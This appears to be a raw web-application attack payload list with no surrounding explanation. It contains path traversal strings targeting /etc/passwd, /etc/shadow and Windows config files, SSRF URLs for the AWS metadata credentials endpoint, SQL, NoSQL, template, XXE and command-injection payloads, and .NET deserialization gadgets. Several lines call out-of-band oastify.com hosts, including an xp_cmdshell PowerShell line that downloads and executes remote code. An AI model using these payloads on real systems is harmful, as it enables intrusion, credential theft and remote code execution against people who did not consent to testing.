C:\\Windows\\System32\\drivers\\etc\\hosts
\\\\attacker-host\\share\\maliciousfile
\\\\\\\\127.0.0.1\\\\c$\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts
file:///C:/Windows/System32/drivers/etc/hosts
http://127.0.0.1:9200/_cat
\\\\udbj3hhl7qryyc3fqxpc97bptgz7nxbm.oastify.com\\foo
C:\\Windows\\System32\\drivers\\etc\\hosts
http://127.0.0.1:80
http://169.254.169.254/latest/meta-data/
..\\..\\..\\..\\Windows\\win.ini
../../../../Windows/win.ini
file:\\\\C:\\Windows\\System32\\drivers\\etc\\hosts
file:\\\\C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts
\\\\udbj3hhl7qryyc3fqxpc97bptgz7nxbm.oastify.com\\test
\\\\\\\\udbj3hhl7qryyc3fqxpc97bptgz7nxbm.oastify.com\\\\test
\\\\udbj3hhl7qryyc3fqxpc97bptgz7nxbm.oastify.com\\share
\\\\\\\\udbj3hhl7qryyc3fqxpc97bptgz7nxbm.oastify.com\\\\share
file:///C:/Windows/System32/drivers/etc/hosts
http://127.0.0.1:8080/admin
..%5c..%5c..%5cWindows%5cwin.ini
C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts
..\\\\..\\\\..\\\\Windows\\\\win.ini






-------------------
"../../../etc/passwd"
"..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts"
"file:///etc/passwd"
"file://C:\\Windows\\win.ini"
"../../../etc/passwd\u0000"
"../../../etc/shadow\u0000.txt"
"http://127.0.0.1:80/admin"
"http://localhost:8080/internal-api"
"https://169.254.169.254/latest/meta-data/"  // AWS metadata
"file:///proc/self/environ"
"..%2F..%2F..%2Fetc%2Fpasswd"
"..%252F..%252F..%252Fetc%252Fpasswd"
"\u002e\u002e\u002f\u002e\u002e\u002f\u002e\u002e\u002fetc\u002fpasswd"
"\\\\..\\\\..\\\\..\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts"
"..\/..\/..\/etc\/passwd"
"{"$type":"System.IO.FileInfo, System.IO.FileSystem","FileName":"C:/Windows/win.ini"}"
"{"constructor":{"prototype":{"shell":"/bin/sh -c 'cat /etc/passwd'"}}}"
"{ $where: 'sleep(5000)' }"
"{ $regex: /.*/ }"
"{ $ne: null }"
"${7*7}"
"{{7*7}}"
"<%= File.open('/etc/passwd').read %>"
"#{File.open('/etc/passwd').read}"
"file.txt; cat /etc/passwd"
"file.txt && whoami"
"file.txt | netstat -an"
"<!DOCTYPE test [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><root>&xxe;</root>"
"'; WAITFOR DELAY '0:0:5'--"
"'; SELECT @@version--"
"' UNION SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Users'--"
"'; EXEC xp_cmdshell 'powershell -c \"IEX (New-Object Net.WebClient).DownloadString(\"http://qf9f5djh9mtu085bstr8b3dlvc13pudj.oastify.com/test\")"\"--"
"@System.Web.UI.DataBinder.Eval(@HttpContext.Current,\"Request.ServerVariables['PATH_TRANSLATED']\")"
"Microsoft.Data.SqlClient.SqlConnection, System.Data.SqlClient"
"http://169.254.169.254/latest/meta-data/"
"http://169.254.169.254/latest/user-data/"
"http://169.254.169.254/latest/meta-data/iam/security-credentials/"
"C:\\inetpub\\wwwroot\\web.config"
"..\\..\\..\\..\\Windows\\win.ini"
"../../../Windows/System32/inetsrv/config/applicationHost.config"
"$.AddOrUpdate(\"key\", (string s) => Process.Start(\"cmd.exe\", \"/c ping -n 5 127.0.0.1\"), (string s, T t) => t)"
"System.Diagnostics.Process.Start(\"cmd.exe\",\"/c ping qf9f5djh9mtu085bstr8b3dlvc13pudj.oastify.com\")"
"/wEPDwUKMTYzNDg3OTA5NWRkbM6oaVB94GiMegDAYfD2Kn4Yxw=="
"'; EXEC sp_OACreate 'WScript.Shell'; EXEC sp_OAMethod 'WScript.Shell', 'Run', Null, 'cmd /c dir > C:\\temp\\output.txt', 0, 1; --"
"<!--#include file=\"/etc/passwd\" -->"
"<!--#include virtual=\"/web.config\" -->"
"'; EXEC master.dbo.xp_dirtree '\\\\YOUR-IP\\share'; --"
"'; EXEC master.dbo.sp_configure 'show advanced options', 1; RECONFIGURE; EXEC master.dbo.sp_configure 'xp_cmdshell', 1; RECONFIGURE; --"
"\\\\qf9f5djh9mtu085bstr8b3dlvc13pudj.oastify.com\\share\\file"
"file://qf9f5djh9mtu085bstr8b3dlvc13pudj.oastify.com/share/file"
"http://instance-data/latest/meta-data/iam/security-credentials/"
"http://s3.amazonaws.com/iam/policy"








"'; EXEC xp_cmdshell 'powershell -c \"IEX (New-Object Net.WebClient).DownloadString(\"http://514urs5wv1f9mnrqe8dnxiz0hrnjb9zy.oastify.com/test\")"\"--"
"System.Diagnostics.Process.Start(\"cmd.exe\",\"/c ping 514urs5wv1f9mnrqe8dnxiz0hrnjb9zy.oastify.com\")"
"\\\\514urs5wv1f9mnrqe8dnxiz0hrnjb9zy.oastify.com\\share\\file"
"file://514urs5wv1f9mnrqe8dnxiz0hrnjb9zy.oastify.com/share/file"
